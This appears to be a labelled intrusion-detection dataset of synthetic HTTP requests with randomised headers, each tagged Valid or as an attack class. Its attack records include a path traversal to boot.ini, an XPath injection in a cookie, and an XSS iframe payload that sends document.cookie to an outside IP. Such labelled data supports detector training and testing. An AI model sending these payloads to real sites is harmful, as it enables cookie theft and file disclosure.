UA-Disp: 8747,794,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8258x863
Via: haeIg/4.1 www.wh3ap6Td.jpeg, 8.2 www.ymao.js
Transfer-Encoding: esla
Upgrade: hrA/6.7, e6zNoo/8.6, lilor/5.4, esys/7.1
Warning: 112 www.nlni5Osh.jpg "eEdDh" "Thu, 31 Jan 08 18:55:01 CET"
X-Forwarded-For: 15.44.254.140
X-Serial-Number: 41667021783349598958
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12386
Start - Id: 23605
class: Valid
GET /e2/ittkcoIokta/HmomR-SPs@tmp/eyGexHlMxkn9a/ocuiyadglkqt4lmf9hso/Nunionz.EbnI/cUxqkQSybVJSkqE@4ZC/rQgxqnbxxFbfo16d/a1u0g2ioedEL27abepln/AL8.exe?eoofDSoafh=305099796&ew4OEwjeod=l&ssenmifoAf=iWlmt8Kv8sG HTTP/1.1
Host: 210.46.146.253
Connection: woshnxeb
Accept: */*
Accept-Charset: cp-950;q=0.5, iso-2022-kr;q=0.1
Accept-Encoding: identity;q=0.2, compress
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 144.62.38.191
Cookie: documentJQhe=tfe;yepbroeo9=eaeinhhenpotedoaeo;cTijdTenGhf=cNentnbdnaenugsnd;Rrt7kwherekEOhQc=0BMFqdp4r9kI;.Q_V=sTudmearMIagctIiz
Cookie2: $Version="509"
Date: Sat, 10 Nov 07 23:26:59 CET
ETag: W/"aD82CkxrDJ3QF4-U"
Expect: eifstk=wtY4af;wAtp
From: rwtn1n@eIllaoac.org
If-Modified-Since: Thu, 03 Aug 06 01:41:51 CET
If-Unmodified-Since: Tue, 28 Nov 06 10:34:55 UTC
If-Match: "wSF4SUPd_uX8LxUPB0w"
If-None-Match: *
If-Range: Fri, 14 Nov 08 19:38:09 GMT
Max-Forwards: 8
MIME-Version: 1.8
Pragma: rcrgcst=eat
Proxy-Authorization: NTLM ck9id3B0bXdoZUFxZTRwcGVlaWluaG56cmxuZW9zazlGbjg=
Authorization: Basic cWFhTjo1YWlvTQ==
Range: 73-699
Referer: http://www.lxp6ajbm.com/jMsna/k7ryuzi/keismaas/4md2jsle.asmx
TE: deflate,trailers
Trailer: User-Agent
User-Agent: raIuSedsta (2toH3x; d61gkpo1; q5mxPi92-; oxcrMO; uS49UP_)
UA-CPU: PowerPC
UA-Disp: 990,4504,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 361x375
Via: HTTP/4.7 221.130.103.165, HTTP/0.4 68.14.239.205, 1.4 237.51.72.8
Transfer-Encoding: edEl; TdaAq=wxsh
Upgrade: 0hrIfz/4.4, oepr/9.3
Warning: 942 www.stchto.jpg "wMlilUefo" "Sun, 18 Jun 06 16:19:46 UTC"
X-Forwarded-For: 161.208.121.203
X-Serial-Number: 266315250602737413
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23605
Start - Id: 5712
class: Valid
PUT /oieqetugcojd/dupnmeean/iOhpME-WCXH/ytutu/9wK26cFtFUl93l/elDRr9QQxLyEoWilB/xV.aYnjsock_stream5E7execgrs/itae1ebxrttfattsdNht/eoJHqdAOc8c-R/rqrEkBaBrM/muLXxel0JpqghIgn.asmx? HTTP/1.0
Content-Length: 84
Content-Language: 7d
Content-Encoding: identity
Content-Location: /btmohrf/ds2vw/eznae/Erelaner/roRe.asmx
Content-MD5: dmRldGFlcWlud3BvcmxBdw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 18 Jan 08 06:27:09 UTC
Last-Modified: Wed, 19 Apr 06 11:35:24 GMT
Host: 210.4.132.228
Connection: keep-alive
Accept: image/*, application/rtf;q=0.6, text/html
Accept-Charset: *;q=0.3
Accept-Encoding: deflate, gzip;q=0.1, deflate, gzip, identity
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 124.131.255.178
Cookie: teNthagyl61y=14892;iiesmod=oeeietse;nabas=dItesb8aegh
Cookie2: $Version="32"
Date: Fri, 07 Nov 08 19:30:35 GMT
ETag: "VVGNW8zSXxQI4.C1N"
Expect: 100-continue
From: ototLn2u@5heey.uk
If-Modified-Since: Fri, 24 Apr 09 04:11:51 CET
If-Unmodified-Since: Thu, 25 Jan 07 04:40:45 CET
If-Match: *
If-None-Match: "Qoq1w6_UNGcl20zu"
If-Range: Thu, 22 Feb 07 15:40:33 CET
Max-Forwards: 9749
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic b3RnZTM6cG5OMXRycnk=
Authorization: Digest qop=mPie
Range: 40090-
Referer: http://cniejt.be/etEvlNb/0saotwe/arwfdiTa.msf
TE: chunked
Trailer: Cache-Control
User-Agent: Mozilla/9.7 (Machintosh; U; PPC 9.9; nr-Ml; rv:4.3.6) Gecko/20326578
UA-CPU: Sparc
UA-Disp: 1912,4963,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3416x9061
Via: HTTP/8.9 115.39.122.70, 0.2 232.216.89.160
Transfer-Encoding: identity
Upgrade: nxew/9.7, neam/4.9, tRYe/6.4, 8mide/6.4, aola/1.1
Warning: 479 www.cld3el.css:64 "ogBceDtbEhhj6uwZ" 
X-Forwarded-For: 15.65.145.193
X-Serial-Number: 7835393170
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ieojdNr= :srxunwll&eLhjelo=lieM&esTIneIzcN=uylTuhel&tinpveba=or7&e0=5$phtttnle1o

End - Id: 5712
Start - Id: 8379
class: Valid
GET /etgsonu3nlnm/emah/n2Sh_/hTmrwel5/tola09n/ethidr/ds/neens/5onhodreaatnn8ai/Vf7rsiAXwe@KDy8.js?yet1lfvnot8aieh=32 HTTP/1.0
Host: www.stna.ch:80
Connection: oenl
Accept: */*;q=0.0
Accept-Charset: big5;q=0.5, windows-1254, x-mac-arabic
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: terEatl=v
Client-ip: 90.200.182.155
Cookie: gKservices3Cy=1418;JhwuL9=nsot-
Cookie2: $Version="08"
Date: Wed, 13 Feb 08 12:46:01 UTC
ETag: W/"v7S-SiZtgEZ6Iy70PYG"
Expect: 100-continue
From: erpa3@smdtCgnon.be
If-Modified-Since: Tue, 10 Jan 06 15:43:30 CET
If-Unmodified-Since: Sat, 28 Feb 09 04:48:43 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 26 Mar 09 15:03:41 UTC
Max-Forwards: 09
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: Basic ZGtjczplWWNuZHRmRA==
Authorization: n7wfh 1tTenn=nsmpnDir
Range: 994131-66069
Referer: http://www.ssHu.de/mdeW/iqet/od5nrtl/mdnji6.gif
TE: gzip
Trailer: Accept
User-Agent: Mozilla/3.4 (X11; U; Linux i586 8.7; TT-jo; rv:5.8.3) Gecko/09632455
UA-CPU: PowerPC
UA-Disp: 283,560,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6131x831
Via: FTP/5.6 www.5nrr.gif
Transfer-Encoding: gzip
Upgrade: o1iL/4.6
Warning: 051 142.192.100.17 "aDe4she" 
X-Forwarded-For: 240.233.176.16
X-Serial-Number: 482816
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8379
Start - Id: 10356
class: Valid
GET /oai4sisehrrxhlqesee/tajFDa87t701jJbQgsx/i2.sh?5Zibip=autoexecsshutdown5%3Fyforme&ipetnelrsii=408708&uteoxsgt=40293&DWJ4=235&9oerel1w1uFrryf=Te%2B&tzefasu5ut=3552 HTTP/1.0
Host: www.eltc.st:12
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: 5Scse-coin78;q=0.9, ont-ieeae, oNf4-H9enrcnd;q=0.3, mJe-st5ifsg;q=0.0, ieio-ug3ol;q=0.9
Cache-Control: no-cache
Client-ip: 95.195.225.89
Cookie: 2Hna10d=ieaotnph-I7=%lit;rilnsiri9e=yCaitl7rRqhi1u;8aomirnsurmn5n=812;ryenA=mmXk;mieS10hye=17;stahn=salog
Cookie2: $Version="123"
Date: Fri, 15 Jul 05 15:07:25 GMT
ETag: W/"RC1hk2Sp38cGZQzla3.C"
Expect: 100-continue
From: ttshinja@3PStlfueE.gov
If-Modified-Since: Sun, 16 Jan 05 06:39:35 UTC
If-Unmodified-Since: Tue, 19 Jun 07 23:25:04 UTC
If-Match: "vahSFrjSQ6F_5AQ_8"
If-None-Match: "9@apQt-NFQ_dplf9Yh"
If-Range: *
Max-Forwards: 70
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Basic ZGE5ZTpwZXJRYXR1Yg==
Authorization: Digest nonce
Range: 029-
Referer: /gexeneT/WIqeedp.swf
TE: trailers,deflate;q=0.8
Trailer: Pragma
User-Agent: seneunu/9.8
UA-CPU: 68000
UA-Disp: 6878,6182,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 164x0597
Via: 3.6 239.218.186.38:3, 3.0 www.erh6.css
Transfer-Encoding: gzip
Upgrade: tode/1.3
Warning: 789 148.216.97.93 "he2Hr6c" "Thu, 03 Aug 06 14:02:34 CET"
X-Forwarded-For: 180.232.254.90
X-Serial-Number: 780593
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10356
Start - Id: 14546
class: Valid
GET /1disatctentspefrmNn/d31lRZH-HHrF5.rr/9NmY3jIcZ/88.js? HTTP/1.1
Host: 180.23.186.181
Connection: keep-alive
Accept: audio/*;q=0.0, image/gif
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 72.88.96.237
Cookie: ulhhaeLRtlyiboe=wherep;oluhhHuNca=otfAs;pac0=arongmtss4exdli;jUenadOd=dMU1;ham0T=06;nis1llt0y7euwr=010
Cookie2: $Version="88"
Date: Fri, 24 Oct 08 10:32:55 UTC
ETag: W/"NjIXziyFikE@YlZIL"
Expect: ernvtrr
From: izhee@mtbHevOaee.gov
If-Modified-Since: Sat, 07 Feb 09 06:23:46 UTC
If-Unmodified-Since: Wed, 23 Mar 05 12:48:40 CET
If-Match: "lmO8qR-IyAo1QsM"
If-None-Match: *
If-Range: "LJAu0vO3-rn--Yd"
Max-Forwards: 575
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: NTLM bHBkZXhhZWFrU28wZE9lcGZxbmk4dXNwdXBwN1N5ZU5jZVVpTWVudVNkaXRP
Authorization: nSaM aon83ao=ds7ofreo
Range: 4019-22,-23,269-5
Referer: http://aree.com/tpece/6fso/0raeUtii/ySbH/yq8qd8.php3
TE: gzip,trailers,chunked
Trailer: If-Range
User-Agent: dVL-PGep http://www.Slsr.gov
UA-CPU: StrongARM
UA-Disp: 2949,5264,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7668x5565
Via: FTP/1.0 225.11.146.111, HTTP/9.8 www.li0c.gif
Transfer-Encoding: deflate
Upgrade: scAhts/5.3, ntread/5.7, ttaotf/9.8, Otisii/6.3
Warning: 142 104.193.18.113:51 "sAoysfr0thamu" "Mon, 28 Feb 05 16:07:23 UTC"
X-Forwarded-For: 210.113.117.167
X-Serial-Number: 267686461
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14546
Start - Id: 45787
class: PathTransversal
GET /sVUslleseerroSsAiin/aSDeXLIR9/hfQ/VEufxdo2idergenexrhr/hjb5_lKwgJfPCyuaf/cmio/eziTD.oQuWMXuQkN6Z/xcrOt1is/f06digfd0iIctpnxte.css?QHD2Ujzs0C=a%3A%5Cwinnt%5Cboot.ini HTTP/1.1
Host: 175.250.178.52
Connection: close
Accept: */*;q=0.8
Accept-Charset: iso-10646-ucs-2, x-mac-ce;q=0.4, macintosh
Accept-Encoding: *;q=0.7
Accept-Language: l2mdp-ouratlg, taaee-l, h-vo
Cache-Control: min-fresh=7
Client-ip: 40.147.120.92
Cookie: 66tyb=639;0AiframedeIh8usrZ9=6;p9aef0odseanh6o=erU
Cookie2: $Version="26"
Date: Wed, 15 Nov 06 10:13:29 GMT
ETag: "1UYXYoyn1ISOZ-ytTEbk"
Expect: 100-continue
From: rsj6lTrn@Ezll0rry.ch
If-Modified-Since: Fri, 15 Aug 08 10:56:09 UTC
If-Unmodified-Since: Sat, 20 Aug 05 17:53:16 UTC
If-Match: "lbd_K9.Apy.46heIG8"
If-None-Match: "tm2vALpcmhbfa@eOmu"
If-Range: *
Max-Forwards: 852
MIME-Version: 1.4
Pragma: Bihebek=odi0ia
Proxy-Authorization: attk esmu5=OSiF3tt
Authorization: Basic ZGtuT2Npajp0TWlPMnQ=
Range: 855-
Referer: /daetdtl/onTrh3a/m4nl/rsoAebs.jpeg
TE: trailers,chunked
Trailer: Authorization
User-Agent: Mozilla/3.0 (Windows; U; Win98 2.5; a3-fp; rv:7.6.5) Gecko/35806568
UA-CPU: PowerPC
UA-Disp: 4288,202,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 9422x259
Via: 5.0 www.anoIep.jpeg
Transfer-Encoding: gzip
Upgrade: F3awa4/4.3, 9rim7/0.4, reilie/2.8, 3il/4.5, Stse/6.1
Warning: 610 192.1.135.3:2396 "ysstaeiltotrenks" "Sun, 26 Mar 06 18:59:14 UTC"
X-Forwarded-For: 0.142.120.56
X-Serial-Number: 324157325
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45787
Start - Id: 27033
class: Valid
GET /hXq.xLca/nOe7tso/zJ-4IbOplikegFVaWn/ijVXjrzM/nenoto0n9tblrhaenu/qpieFQqHZgfAX.T6WW5z.aspx? HTTP/1.1
Host: www.ti2eSa.gov:80
Connection: CihruH
Accept: */*
Accept-Charset: windows-1254;q=0.0, euc-kr, windows-1251;q=0.5, iso-8859-6;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=1
Client-ip: 48.35.201.58
Cookie: g6nGvhei=8tnoali delete7srml[idzsg;f9=tu4JtdfgQXPj;cfw=dhibidf6mbpf
Cookie2: $Version="40"
Date: Mon, 25 Apr 05 18:12:32 CET
ETag: W/"a1f3Bl9qZLzjrTVjn6"
Expect: r4tkzc=catnn;Tlsetp=inndHtor
From: RPoOyeue@ifon.de
If-Modified-Since: Thu, 21 Aug 08 24:21:34 UTC
If-Unmodified-Since: Tue, 16 Jan 07 21:54:33 CET
If-Match: *
If-None-Match: "pOAw_CpH4bgpCrQ"
If-Range: *
Max-Forwards: 279
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Basic b3RuaWFSYTpodG5vdGk=
Authorization: tAst smata=oAfq
Range: -2,41933-,520-237717
Referer: /lak4nda/eeoaids/ayui.php
TE: chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: ronehbsst/8.8
UA-CPU: StrongARM
UA-Disp: 2539,8756,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6860x985
Via: iamet/9.5 www.8tfpet.htm, 5.3 www.gnFns.tiff, sgeReb/6.6 www.tsewame.jpeg
Transfer-Encoding: deflate
Upgrade: oleg/7.0, eesLi/0.3, s6tY/7.4, Ehnhw1/4.6
Warning: 487 190.19.226.50 "taog3tlnve" "Mon, 04 Jul 05 09:35:24 CET"
X-Forwarded-For: 41.72.7.124
X-Serial-Number: 200865883783933233
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 27033
Start - Id: 3638
class: Valid
GET /soX/Uy/aA4dkntnreR9Rm/@hFKyq/5DkzYo2JRmR/syeshlhicretrri2tsh.html?ohewzne=lntwkplxtfe&eisehsdumced=8644513&toyesttgtvdnZ=EttVi0hnsi&KXtmpr=48264965&ov4e1Nel2iDlo=710&55isVagdMshjy=nse&chuasmbeIaesr5i=uxf0&vbenumhsohySohg=lpaaembuboTo&jmlS5cX2@=lpp&b@group byUm@j=o+e&recarkwiyie=kpsS+r&e2n=iconnectr%29&eeieedeUs8t=5192&9nne=o6IJzsmP HTTP/1.0
Host: 90.89.48.152
Connection: o8sw
Accept: */*;q=0.8
Accept-Charset: koi8-r
Accept-Encoding: deflate, identity, identity;q=0.8
Accept-Language: *
Cache-Control: no-transform
Client-ip: 247.34.126.105
Cookie: ic2eaA=hlogmwhereautoexecued-txt;s8mNmh=rtb;r2u=oatohehsvtouauuzc;lBlikevTdocumentiJy=o\ec9&r@me8t2Y?otelnet;peieexno0ftiur=|;scauyneoiwstvfj=1372691685
Cookie2: $Version="387"
Date: Mon, 02 Nov 09 05:44:12 GMT
ETag: "kKa@X1stg9PBNpTOZ"
Expect: ttbs=Iammcyan;ehvTg=Btegrha
From: iaeitS7@hsAh8.fr
If-Modified-Since: Tue, 29 Mar 05 06:17:44 GMT
If-Unmodified-Since: Thu, 04 Aug 05 07:06:20 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Digest opaque="nde1rea"
Authorization: NTLM cmFpZmhmbW8wYW9lYWFybzhzZXVFZ2UyaGllZU5ndHRlaVlN
Range: -66041,943-,-24
Referer: /et14en.cfm
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: tutrAogqpb/5.0.5
UA-CPU: Sparc
UA-Disp: 8239,236,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 767x775
Via: 4.7 www.8gthhOed.js, 5.6 41.35.178.154:84266, 9.5 44.196.123.108
Transfer-Encoding: compress
Upgrade: decg/1.7
Warning: 743 www.dejhzUo.png "iisl" 
X-Forwarded-For: 153.114.223.45
X-Serial-Number: 02989198199377
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3638
Start - Id: 25752
class: Valid
GET /w7Snmi2gmE89orDT5UQp/F1KWCn-/9ouXZVNK8hS65M1/r@abqEL.asp? HTTP/1.1
Host: 200.119.121.101
Connection: close
Accept: application/*
Accept-Charset: iso-2022-jp, iso-8859-4, iso-8859-2
Accept-Encoding: identity;q=0.9, identity;q=0.0, identity;q=0.7, compress;q=0.2
Accept-Language: ym6wsba-Syiaa, 3-cn5aaon;q=0.0, rrsaio-hojm3th;q=0.0, t5Osh-sFsarj;q=0.5
Cache-Control: no-store
Client-ip: 231.14.230.156
Cookie: lif=arr9dstdinctea@h;uuooattwh=0155807741;pten9pi9eset=19625
Cookie2: $Version="38"
Date: Thu, 22 Apr 04 02:13:23 CET
ETag: W/"KyQq33LfhFPbLrP6"
Expect: 100-continue
From: Fisonn33@rmkNOgAs.ch
If-Modified-Since: Thu, 27 Nov 08 11:43:28 GMT
If-Unmodified-Since: Fri, 06 Aug 04 23:39:44 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 25 Dec 06 06:56:14 UTC
Max-Forwards: 42
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM YXNTNjNlaG1hZWZmc2FDZTZhczR3aXJhNm13c25hYW9uaWlydGgza2Fz
Authorization: Digest realm
Range: 5458-41874
Referer: http://1lnp.net/aupt/deed/dtn1Rl/rt5eer.gif
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/8.1 (compatible; Konqueror/5.9; Mac OS X; oyse8i1nlg; ssoseteh; Udhac)
UA-CPU: x86
UA-Disp: 281,591,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6588x200
Via: HTTP/3.1 www.nrhc.html, FTP/4.8 www.tiat.htm, HTTP/2.7 www.3encee.gif
Transfer-Encoding: deflate
Upgrade: ceULo/2.9, itmu/9.5, m6nr5/9.3
Warning: 019 www.crdaky7H.htm:4 "ktng2aWa3" 
X-Forwarded-For: 249.109.166.6
X-Serial-Number: 960628745817709
----: ---------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 25752
Start - Id: 47796
class: XSS
GET /u8lVbnz/oogtniRDs/ue/oRa9t1mNdphpxFuGe/6lF63gBuL/i2yehh8sa/Cy5G0Eu/uu.cgi?mriimirtymeee=5reR+%3Eee&rbPl=d9nIfd&8l3ny5hmceeoab=24464152&e8eed=%3Ciframe+++++src+%3D++%22+++++vbscript%3A%5Bwindow.open%28%27http%3A%2F%2F188.73.173.110%2Fnsoril.aspx%27%2Bdocument.cookie%29%3B%5D+++++%22%3E&fyB5Ab3=maNnhh%7Ciroi&cosnpatwd=228238&QGSchtpassYlog=wc0tIerrIajrutse&o7lwi=metamocha1t&hesIDho=dmEOAH10d&tfnsknaL5s=Edspassthru9i&HsrsHeckg9Lnea=992086586&t9ttvfshhpsr=t&ttleseAemtiecb=tGi4B%40 HTTP/1.0
Host: www.mypmrir.org
Connection: oeersga
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: t9o-rehinanu;q=0.4, errsne-a1h;q=0.2
Cache-Control: no-cache
Client-ip: 19.80.216.59
Cookie: adminJiyq=6575;rEPVFlWv=142
Cookie2: $Version="10"
Date: Sun, 20 Dec 09 24:13:20 GMT
ETag: W/"0gwgQpp6mZtSr2.Zvl"
Expect: mihtnn
From: dRkiaeue@o6si.cz
If-Modified-Since: Sat, 03 Nov 07 16:38:44 CET
If-Unmodified-Since: Mon, 17 Jan 05 07:53:36 UTC
If-Match: *
If-None-Match: "0QiSEmup8eShnWI@g.eh"
If-Range: Fri, 17 Aug 07 10:37:17 CET
Max-Forwards: 55
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Digest username="oaid"
Authorization: Basic ZWRTMTp2VzJveWU=
Range: 56-,617417-
Referer: http://omhhhMt1.gov/ey9e/soe4erm4.css
TE: deflate,deflate;q=0.9,trailers
Trailer: Accept-Language
User-Agent: Mozilla/0.6 (Machintosh; U; PPC 3.9; ta-ri; rv:1.7.2) Gecko/86176877
UA-CPU: x86
UA-Disp: 184,045,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 876x886
Via: 3.7 57.239.25.118
Transfer-Encoding: compress
Upgrade: cOeQ/0.4, boyed/0.6, stEhr/6.5, lfqeh/2.9
Warning: 348 www.lhsep.png "gefrthtkaanhwheldAc" "Sat, 20 Mar 10 09:17:23 UTC"
X-Forwarded-For: 208.82.57.120
X-Serial-Number: 14491
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47796
Start - Id: 5544
class: Valid
PUT /um7nPAQIk0D1D/lq7hZmG-D8@6zV3O/shplrchwa/PK/3fN/ay0KEbA.htm? HTTP/1.1
Content-Length: 41
Content-Language: ol8m,mW,2ewhose
Content-Encoding: gzip
Content-Location: http://ltrp9.de/uumq/d5eanm/petlEE/eEtie/pooSEopR.wmn
Content-MD5: YWFzc29sYXRobWlJdDBFZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Feb 09 08:39:06 GMT
Last-Modified: Wed, 16 May 07 11:32:12 GMT
Host: www.moys2sDrdm.net
Connection: tbdpoc
Accept: */*;q=0.7
Accept-Charset: iso-8859-2;q=0.2, cp-936, windows-1254
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-age=645
Client-ip: 243.193.112.100
Cookie: rthbfuhelpjsD4=sE;uazBrHhiieixa=ibk;inLneuyupd=038676
Cookie2: $Version="349"
Date: Thu, 04 Feb 10 13:23:45 CET
ETag: W/"H8JPI40baMqM55lkNgM"
Expect: 100-continue
From: niaHt3Oo@ny0dtrh.net
If-Modified-Since: Sun, 11 Mar 07 01:56:12 GMT
If-Unmodified-Since: Fri, 25 Jul 08 20:11:58 CET
If-Match: "8DmGzvyoGbR-sj3pJH"
If-None-Match: "CFFNnK_sYCEX.0I4"
If-Range: "p_Ch4iZHjIxEu6nD"
Max-Forwards: 741
MIME-Version: 1.1
Pragma: aeiegds=6rseqt
Proxy-Authorization: Basic YXRvVGhuOnRvYTQ=
Authorization: Basic c3ZGcGc6aUlsb28=
Range: 6092-077254
Referer: /eeltlhi/tfkbDgtu/e1ho/Fytgd.nsf
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/7.4 (Machintosh; U; Mac OS X 5.2; oi-w9; rv:5.2.5) Gecko/71752243
UA-CPU: x86
UA-Disp: 0010,843,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 9319x330
Via: 6.6 21.6.242.194, 4.8 www.Lhileuer.jpg
Transfer-Encoding: gzip
Upgrade: eseJ/5.2, eTyY/2.2
Warning: 780 188.52.238.187:59 "NCkieadp6inaino" 
X-Forwarded-For: 176.55.228.31
X-Serial-Number: 5097796244152405039
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

1zKT=IaU&awimooskdR=group byke&napnu=opti

End - Id: 5544
Start - Id: 48484
class: XPathInjection
GET /aXddHn0Oltq/tyenVta.php4?ALRe=ohebll7yoenn&connecto5zc-Snc7s=%3C%27&h5hmligpda=+at%24aiklink%3D&srhnc=o%7Ee&etpr3alupt=duecoecatnE4SeUsno HTTP/1.0
Host: 251.141.226.3
Connection: keep-alive
Accept: image/jpeg, audio/*;q=0.0, video/mpeg
Accept-Charset: iso-8859-9;q=0.6, iso-8859-9;q=0.3, x-mac-arabic, cp-936
Accept-Encoding: *;q=0.5
Accept-Language: uee-Tc, 1mlNMjdk-ptx, o7AuIfyy-eyea
Cache-Control: only-if-cached
Client-ip: 193.133.230.225
Cookie: vsoe=l8Uay;aE5ni2o=937    or   tepoem/haeeOi/dcsntt/child::node()[position()=424]  or  445=;tzhc=arm;sbaY6=es6Qeme'l
Cookie2: $Version="876"
Date: Wed, 28 Jan 04 10:52:19 CET
ETag: "Km-bZPSYMLEu8@iWH"
Expect: ermhccro
If-Modified-Since: Sat, 06 Sep 08 16:07:05 CET
If-Unmodified-Since: Sat, 16 Sep 06 18:02:46 CET
If-Match: "G2M41LVq5uJaUaMH8u"
If-None-Match: *
If-Range: Mon, 08 Mar 10 12:52:25 GMT
Max-Forwards: 9680
MIME-Version: 6.0
Pragma: e5='Heoe'
Proxy-Authorization: obieN setcai=mtg2ffhs
Authorization: woe5q irbers=szee
Range: 46-259,000-
Referer: /ersrt.exe
TE: chunked;q=0.2,chunked,gzip;q=0.6
User-Agent: Mozilla/0.6 (X11; U; Open BSD i386 5.1; Tq-nl; rv:4.5.2) Gecko/76319215
UA-CPU: MIPS
UA-Color: color8
UA-Pixels: 4682x826
Via: HTTP/3.1 www.osthc.js:133, HTTP/4.8 60.252.92.180, 4.9 www.2tm2xe.js
Transfer-Encoding: compress
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48484
Start - Id: 3250
class: Valid
GET /oarL1nn/iyKi6YQ/elkA0o3/tLc1KygYGpQtCaBXE/TtWesrsroudlsrei/jpq4WxBMtaT/nwsalgw2uw/toea9kt-KV/8rlar3t3lszidngdv.msf?Ha=tren%5Cnfdoyritmpe&b4962gEheagE=3180598&atHprinphtodmpd=aneO%28teap%24keservices&k_NdesAllr5=odjC8PwCJIXY&hs=inslO&tcceAsTcm=sotnc HTTP/1.0
Host: 139.217.164.64
Connection: close
Accept: video/*, video/mpeg
Accept-Charset: *
Accept-Encoding: compress;q=0.8, deflate, gzip;q=0.9, compress
Accept-Language: cnnsiz-pai7, oth-4AO
Cache-Control: no-cache
Client-ip: 112.59.59.14
Cookie: nn8llhtrTef=wgetsengeudhm;hehhwn8eeeriW2n=nuuC1evssjse;dhu=e3bedt2exec;T2ofsnc=lps> be6qcshutdowned5;azA=398413
Cookie2: $Version="29"
Date: Tue, 28 Jul 09 12:50:18 UTC
ETag: "X9kcHXqb@HPoA6Gp"
Expect: 100-continue
From: rbgi@ue5e.st
If-Modified-Since: Wed, 23 Nov 05 15:49:08 UTC
If-Unmodified-Since: Sat, 17 Jun 06 22:48:45 CET
If-Match: *
If-None-Match: "iEq.flR8iROa-Mt8pu"
If-Range: *
Max-Forwards: 883
MIME-Version: 6.0
Pragma: IOxy='ncC'
Proxy-Authorization: mdtd4r Mierh=aeru9Ogt
Authorization: Basic b2VnMXg2OmF0ZW5zRnI5
Range: -0418,8-
Referer: /dblnn/eoteshn/wcst/oe7a.jsp
TE: gzip,trailers
Trailer: Authorization
User-Agent: Mozilla/9.8 (Machintosh; U; PPC 7.5; ha-dr; rv:7.1.5) Gecko/40798747
UA-CPU: StrongARM
UA-Disp: 355,465,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 796x812
Via: 5ta/4.5 204.151.79.145, 2.5 208.160.26.43, aga/9.8 235.181.124.125
Transfer-Encoding: ngtA0e
Upgrade: m2sia/0.4, ltolt/9.3, r9eb/4.7, shc6de/5.3
Warning: 802 www.oaete.png "o4sslh" 
X-Forwarded-For: 252.218.6.87
X-Serial-Number: 65430
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3250
Start - Id: 23852
class: Valid
GET /iSPCvn-mgCmZh/oV.uQgIYTuwJvyl_.png?reXQ0PG_unionu=oeyntorRGisenenosh&eernl=tsio7e&cgvlanleet8s=eieQ&uwiohapsrthb=ihs&WJT0c0W8iCL=i%29s5hoerwy&4Wu_bd8varhtacceskt=s&rAlm=et8oi HTTP/1.0
Host: www.eOeh.be:21
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: iso-8859-15
Accept-Encoding: gzip, deflate, identity, compress, deflate;q=0.3
Accept-Language: 8ytgb6-mkg
Cache-Control: no-cache
Client-ip: 158.198.144.188
Cookie: 7ulsarG5=6
Cookie2: $Version="78"
Date: Mon, 17 Sep 07 16:39:29 UTC
